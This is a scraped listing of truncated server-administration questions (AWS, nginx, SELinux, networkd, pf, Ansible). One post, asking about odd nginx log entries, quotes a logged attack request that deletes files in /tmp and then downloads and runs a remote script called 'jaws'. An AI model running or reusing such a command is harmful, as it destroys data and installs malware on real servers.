Latest Server related questions

Score: 1
"access to kms is not allowed" error returned when trying to fetch secret from AWS Secrets Manager

An IAM user in our AWS account is trying to fetch a particular secret from Secrets Manager via the AWS CLI, but they cannot do that although they should have the required permissions:

aws secretsmanager get-secret-value --secret-id "config/my/secret"

This fails with the error "access to kms is not allowed". We use DefaultEncryptionKey for encrypting the secret, and the key policy (managed by AWS) looks sensible to me:

Score: 0
Misc08
Can't connect container with bridge to the internet using networkd

I have a server running Ubuntu 20.04 LTS connected through one physical Ethernet interface to the internet. My provider assigned me a static primary IPv4 (I will use A.A.A.A here for this IP), so my systemd-networkd config file looked like this before (I disabled netplan to work directly with systemd-networkd):

# /etc/systemd/network/20-enp7s0.network
[Match]
Name=enp7s0

[Network]
LinkLocalAddressing ...
Score: 0
kwodzicki
SELinux preventing mongod search access

I noticed I am getting some SELinux errors when running mongod for the UniFi controller program. Namely, I am getting:

SELinux is preventing /usr/bin/mongod from search access on the directory /.

SELinux is preventing /usr/bin/mongod from search access on the directory /var/lib/nfs

SELinux is preventing /usr/bin/mongod from search access on the directory fs

SELinux is preventing /usr/bin/mongod  ...
Score: 0
Liam Montgomery
Can't access EC2 on domain name, just on IP. CNAME is correct, and can route this domain to Lightsail server

Thanks for taking the time. I have ported a Lightsail instance over to EC2 and am running a t.2 larger server. I am running a WordPress site and the homepage is just a blank white page.

I have assigned the EC2 an Elastic IP and can access the WordPress server at this IP, 52.27.6.201. But the domain, www.showstream.io, is not available. Anyone have any ideas?

I can point the domain at the lightsail in ...

Score: 0
realtebo
How to avoid nginx redirecting a POST to a GET

I am seeing this in my log:

"POST /openDoor HTTP/1.1" 301 169 "-" "PostmanRuntime/7.29.0"

"GET /openDoor/ HTTP/1.1" 200 113 "https:///openDoor" "PostmanRuntime/7.29.0"

I am doing a POST to /openDoor and I get a 301. Why?

My nginx conf file is this:

server {

    client_body_buffer_size 30M;
    client_max_body_size 30M;


    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_pat ...
Score: 0
andygozindy
Nginx webserver access.log unusual $host
222.187.223.158 - - [17/Feb/2022:15:41:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 444 0 "-" "Hello, world" "http://127.0.0.1"
167.248.133.47 - - [17/Feb/2022:15:45:11 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEF\xC512\xE3\xA4\x1D\xEF\xC4}bA!\x18\x08\xBC\x82X7\x12wuv\x1DD\x00\x8FYJ\xF8\xA6\x0E \x86N\xD1\xBB2z\xC7\xF5i\x96\xE6\xF5\xDB\xE3\x1F\xD5\x5C\xB1 ...
Score: 0
Mat
Installation of Courier 1.0.6-1build2 fails on Ubuntu 20.04

The installation of Courier 1.0.6-1build2 on Ubuntu 20.04 fails, although the courier-package is the one provided by the OS. The problem occurs in a post-installation script which leaves the package installed, but unconfigured and all dependent packages have issues.

The situation has been reported to Ubuntu (see https://bugs.launchpad.net/ubuntu/+source/courier/+bug/1877862), but apart from ›con ...

Score: 0
huzer1
rsyslog doesn't always insert hostname

%HOSTNAME% doesn't get injected inside of all logs that are received. They are coming from the same IP address and most of them get marked. However, some of them just don't get a host name in front of them. In this environment there's no DNS from the interface these logs are coming from. To deal with this, I've inserted the name and IP of the sender into the hosts file of the OS and this works most of t ...

Score: 0
Nigrimmist
Nginx reverse proxy when port is already in use?

I am trying to close a port with basic authentication (for the Pushgateway of Prometheus). I am not a big specialist in nginx, so could someone please give me advice on where I am wrong?

I have port 9091, which should be closed from outside in front of auth. This port is in use by Pushgateway.

My current nginx config:

events { }
http {
upstream prometheus {
      server 127.0.0.1:9090;
      keepalive 64;
 ...
Score: 0
MrPandav
Redirecting traffic to a bridged IP and port using PF on macOS

I am trying to redirect localhost traffic on a specific port to a bridged network IP.

I am using the following:

echo "
rdr pass inet proto tcp from any to any port 9300 -> 192.168.64.29 port 9300
rdr pass inet proto tcp from any to any port 3406 -> 192.168.64.29 port 3406
rdr pass inet proto tcp from any to any port 1234 -> 127.0.0.1 port 8000
" | sudo pfctl -ef -

It works fine for 1234 -> 8000

 ...

Score: 0
Disabling local host ipmitool access

On servers from most/many vendors, I am able to see potentially sensitive information using commands like:

ipmitool user list 1

or

ipmitool lan print 1

Or set new administrator users, all of which do not require authentication.

This is not necessarily something you would want if you give other users bare metal access. Is there a way to prevent a local host user from accessing/modifying the BMC settin ...

Score: 0
Installing docker-ce with ansible debops.docker_server role

I'm trying to install docker-ce using the debops.docker_server role and can't quite get forward. The default seems to install docker.io which I can't use as I need very recent versions direct from docker inc.

- hosts: docker_nodes
  become: true
  collections: [ 'debops.debops', 'debops.roles01',
                 'debops.roles02', 'debops.roles03' ]

  environment: '{{ inventory__environment | d({} ...
